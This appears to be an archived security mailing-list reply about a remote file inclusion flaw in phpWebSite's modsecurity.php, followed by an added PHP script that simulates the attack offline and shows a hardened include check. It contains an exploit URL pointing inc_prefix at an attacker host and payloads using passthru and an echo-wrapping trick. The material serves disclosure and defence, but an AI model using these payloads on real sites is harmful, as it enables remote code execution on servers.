Message-ID: <746.1032800681@www15.gmx.net>
From: avart at gmx.de (avart@....de)
Subject: Re: PHP source injection in phpWebSite
Hi Tim!
> -------- modsecurity.php --------
> <?php
> global $inc_prefix;
> if(!$inc_prefix) {
> ...
> }
> ...
> include_once($inc_prefix."htmlheader.php");
> ?>
> ----------------------------------
>
> If someone requests a URL like
> http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
> the htmlheader.php file from MYBOX would be included,
> and the attacker would be able to include any code he
> wants.
>
> Examples
> ========
> http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
>
> --- htmlheader.php ---
> <? passthru("/bin/ls") ?>
> ----------------------
>
> Output: dir listing of the current directory
That's not completely right. You have to put an "echo" (with the right
quoting) around the evil code, because the evil webserver (MYBOX) usually
executes files ending with .php (if MYBOX doesn't do it, the example is OK).
So usually you want to put the following line in htmlheader.php on the evil
server (MYBOX):
<?php echo "<?php phpinfo();?>" ?>
Now, if you request MYBOX/htmlheader.php, the following line would be
included (and executed):
<?php phpinfo();?>
In Tim's example, the /bin/ls output from the evil machine (MYBOX)
would be included, because htmlheader.php (usually) gets executed because of
the .php suffix.
It's important to point this out; I got a lot of mails from users who didn't
understand how to include $evil_code when $evil_machine (aka MYBOX)
interprets files with the .php suffix.
Just my 0.2 EUR cents
Regards,
Avart
--
Become an "OnlineStar 2002" with us! Choose GMX now -
and grab great prizes! http://www.onlinestar.de
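The two points in this thread, that include_once($inc_prefix."htmlheader.php") lets a request choose the include source, and that the attacker's own PHP interpreter will swallow a bare payload unless it is wrapped in an echo, can be shown end to end in a single local script. The block below is an added example, not code from the thread or from phpWebSite: it simulates MYBOX with an output buffer instead of a second web server, uses a harmless echo marker instead of phpinfo() or /bin/ls, and the directory layout, the helper names (serve_from_mybox, victim_include, safe_include_path) and the hardened variant are this example's own assumptions, not the project's fix.

```php
<?php
// Added example (not from the original thread or phpWebSite): the remote-file-
// inclusion flaw Tim describes, the "echo" trick Avart explains, and a hardened
// form. MYBOX is simulated with an output buffer; the payload prints a marker.
// Directory names and helper names below are this example's own assumptions.
declare(strict_types=1);

$work = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($work . '/mybox', 0700, true);
mkdir($work . '/victim', 0700, true);

// --- What the attacker hosts on MYBOX -------------------------------------
// A bare "<? passthru(...) ?>" would execute on MYBOX (it ends in .php) and
// only its output would reach the victim as inert text. Avart's form instead
// runs an outer <?php ... ?> on MYBOX that emits the inner PHP tags verbatim,
// so the victim receives code, not output.
file_put_contents($work . '/mybox/htmlheader.php',
    '<?php echo "<?php echo \'RFI payload ran on victim\';?>" ?>');

// Simulate MYBOX's PHP interpreter: execute the file, capture what it serves.
function serve_from_mybox(string $path): string
{
    ob_start();
    include $path;                     // executed as PHP, exactly as MYBOX would
    return (string) ob_get_clean();
}

// Simulate the vulnerable include_once($inc_prefix."htmlheader.php"): whatever
// MYBOX served is included as PHP source. A local file stands in for the
// http:// stream wrapper so the demo runs offline.
function victim_include(string $served, string $dir): string
{
    $tmp = $dir . '/fetched.php';
    file_put_contents($tmp, $served);
    ob_start();
    include $tmp;
    unlink($tmp);
    return (string) ob_get_clean();
}

$served = serve_from_mybox($work . '/mybox/htmlheader.php');
echo "MYBOX serves : " . $served . PHP_EOL;   // <?php echo 'RFI payload ran on victim';?>
echo "Victim runs  : " . victim_include($served, $work . '/victim') . PHP_EOL;

// --- Hardened form ---------------------------------------------------------
// Never let the request choose the prefix. Fix it to the install directory and
// refuse anything that does not resolve to a plain file below it (URLs and
// "../" traversal both fail realpath()). Independently, set allow_url_include
// (and, where possible, allow_url_fopen) to Off in php.ini so include() cannot
// fetch http:// sources at all.
function safe_include_path(string $base, string $file): ?string
{
    $root = realpath($base);
    $real = realpath($base . '/' . $file);
    if ($root === false || $real === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                   // outside $base: URL, traversal, or missing
    }
    return $real;
}

file_put_contents($work . '/victim/htmlheader.php', '<?php echo "local header" ?>');
var_dump(safe_include_path($work . '/victim', 'htmlheader.php') !== null);      // true
var_dump(safe_include_path($work . '/victim', 'http://MYBOX/htmlheader.php')); // NULL
var_dump(safe_include_path($work . '/victim', '../mybox/htmlheader.php'));     // NULL

// cleanup
array_map('unlink', glob($work . '/*/*'));
rmdir($work . '/mybox');
rmdir($work . '/victim');
rmdir($work);
```

Run it with `php rfi_demo.php`: the first line shows that MYBOX, because it executes .php files, serves the inner `<?php echo ... ?>` as plain text, and the second line shows that text executing on the victim. The `safe_include_path` checks show the same URL and a traversal attempt being rejected once the prefix is pinned to the install directory; the php.ini settings mentioned in the comment are the belt-and-braces control that removes the remote include capability from the interpreter itself.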